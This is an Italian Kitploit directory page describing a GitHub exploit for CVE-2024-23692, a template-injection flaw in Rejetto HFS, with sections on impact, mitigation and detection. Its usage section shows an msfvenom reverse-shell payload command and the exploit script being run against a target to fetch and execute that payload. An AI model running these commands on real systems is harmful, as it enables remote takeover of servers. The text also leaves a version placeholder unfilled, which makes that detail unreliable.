Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/mr-r00t11/cve-2024-23692
Generazione di PayloadAnalisi delle VulnerabilitàExploitShellcodeSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubmr-r00t11/cve-2024-23692

CVE-2024-23692

Rejetto HFS (HTTP File Server) è un semplice server web di file che facilita la condivisione di file su una rete o su internet.

Vedi Repository
22 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Vulnerabilità CVE-2024-23692 di Rejetto HFS (HTTP File Server)


Panoramica

Rejetto HFS (HTTP File Server) è un semplice server web per la condivisione di file che facilita la condivisione di file su una rete o su Internet. Nonostante la sua facilità d'uso e semplicità, è stata scoperta una vulnerabilità critica (CVE-2024-23692) che rende il server un bersaglio per gli aggressori.


CVE-2024-23692: Vulnerabilità di Server-Side Template Injection (SSTI)


Descrizione

CVE-2024-23692 è una vulnerabilità di Server-Side Template Injection (SSTI) identificata in Rejetto HFS. Questa vulnerabilità consente a un aggressore di iniettare ed eseguire template dannosi sul server. Se sfruttata, può portare all'esecuzione remota di codice, compromettendo potenzialmente l'intero server e i dati in esso ospitati.


Impatto

Un aggressore che sfrutta questa vulnerabilità può:

  • Eseguire codice arbitrario sul server
  • Ottenere accesso non autorizzato a dati sensibili
  • Compromettere l'integrità e la disponibilità del server
  • Utilizzare il server compromesso per lanciare ulteriori attacchi all'interno della rete

Utilizzo

Ottieni una shell utilizzando un binario malevolo creato in msfvenom.

Nota: Lascia nc in ascolto.

root@kitploit:~
# $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.128 LPORT=1234 -f exe > exploit.exe

$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 //192.168.198.128/kali/exploit.exe

[Screenshot_1.png]

Esegui un comando in remoto.

root@kitploit:~
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 systeminfo

Potrebbero essere necessari circa 15 secondi per visualizzare il risultato.

[Screenshot_2.png]


Versioni Affette

Tutte le versioni di Rejetto HFS fino alla versione [inserire qui l'ultima versione vulnerabile] sono affette da questa vulnerabilità.


Mitigazione

Per mitigare il rischio posto da CVE-2024-23692, si consiglia agli utenti di:

  • Aggiornare all'ultima versione: Assicurarsi di utilizzare una versione di Rejetto HFS in cui questa vulnerabilità sia stata corretta. Controllare il sito ufficiale o il repository di Rejetto HFS per gli ultimi aggiornamenti.
  • Applicare le migliori pratiche di sicurezza: Limitare l'accesso al server HFS solo a reti e utenti fidati. Utilizzare meccanismi di autenticazione e autorizzazione forti.
  • Monitorare e controllare: Monitorare regolarmente il server per attività insolite e controllare i log per segni di sfruttamento.

Rilevamento

Per determinare se il server è stato compromesso, cercare:

  • Traffico di rete insolito proveniente dal server
  • File o processi inaspettati sul server
  • Modifiche non autorizzate alle configurazioni del server o ai dati

Segnalazione e Assistenza

Per ulteriore assistenza e supporto, fare riferimento ai forum della comunità di Rejetto HFS o ai canali di supporto ufficiali.


Risorse

  • Sito Ufficiale di Rejetto HFS
  • Dettagli di CVE-2024-23692

Licenza

Questo progetto è concesso in licenza con la licenza MIT - vedere il file LICENSE per i dettagli.


Scarica lo strumento